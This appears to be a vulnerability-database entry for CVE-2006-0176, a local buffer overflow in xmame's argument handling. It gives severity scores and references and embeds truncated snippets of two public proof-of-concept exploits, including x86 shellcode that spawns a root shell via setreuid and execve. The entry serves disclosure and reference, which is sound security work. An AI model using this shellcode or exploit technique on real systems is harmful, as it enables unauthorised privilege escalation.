CVE-2006-0176
Published 2006-01-11
Priority P427, high, 7.2 (CVSS 2.0)
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 1.01% (58.6th percentile)
Buffer overflow in certain functions in src/fileio.c and src/unix/fileio.c in xmame before 11 January 2006 may allow local users to gain privileges via a long (1) -lang, (2) -ctrlr, (3) -pb, or (4) -rec argument on many operating systems, and via a long (5) -jdev argument on Ubuntu Linux.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xmame | xmame | — | — |
No detection rules found.
Exploit-DB
Xmame 0.102 - 'lang' Local Buffer Overflow
exploitdb·2006-01-13
---
/*
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
Coded BY Qnix
[email protected]
#0x11 @EFNET
icq : 234263
0x11.org
Advisory : http://kerneltrap.org/node/6055
e.g:
Qnix ~ # ./exploit /usr/games/bin/xmame.x11
Xmame 0.102 (-lang) Local Buffer Overflow Exploit
Coded BY Qnix
(~) Stack pointer (ESP) : 0xbffff688
(~) Offset from ESP : 0x0
(~) Desired Return Addr : 0xbffff688
GLINFO: loaded OpenGL library libGL.so!
GLINFO: loaded GLU library libGLU.so!
GLINFO: glPolygonOffsetEXT (2): not implemented !
info: trying to parse: /usr/share/games/xmame/xmamerc
info: trying to parse: /root/.xmame/xmamerc
info: trying to parse: /usr/share/games/xmame/xmame-x11rc
info: trying to parse: /root/.xmame/xmame-x11rc
info: trying to parse: /usr/share/games/
Exploit-DB
Xmame 0.102 - '-lang' Local Buffer Overflow
exploitdb·2006-01-10
---
#!/usr/bin/ruby
#
# One of the PoC code for xmame "-lang" options.
# Advisory is base on : http://kerneltrap.org/node/6055
#
# by xwings at mysec dot org
# url : http://www.mysec.org , new website
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 4.0.3 20060104 (prerelease) (Ubuntu 4.0.2-6ubuntu1)
# xmame 0.102 , ./configure && make && make install
#
#setreuid(geteuid(),geteuid()) execl(); executes /bin//sh 49 bytes.
shellcode = "\x31\xc9\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0"+
"\x46\xcd\x80\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+
"\x6e\x89\xe3\x51\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0\x01"+
"\x31\xdb\xcd\x80"
vulnpath = "/usr/games/xmame.x11"
argvopt = "-
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0353.html
http://www.securityfocus.com/archive/1/421849/100/0/threaded
http://www.securityfocus.com/bid/16203
http://x.mame.net/changes-unix.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/24102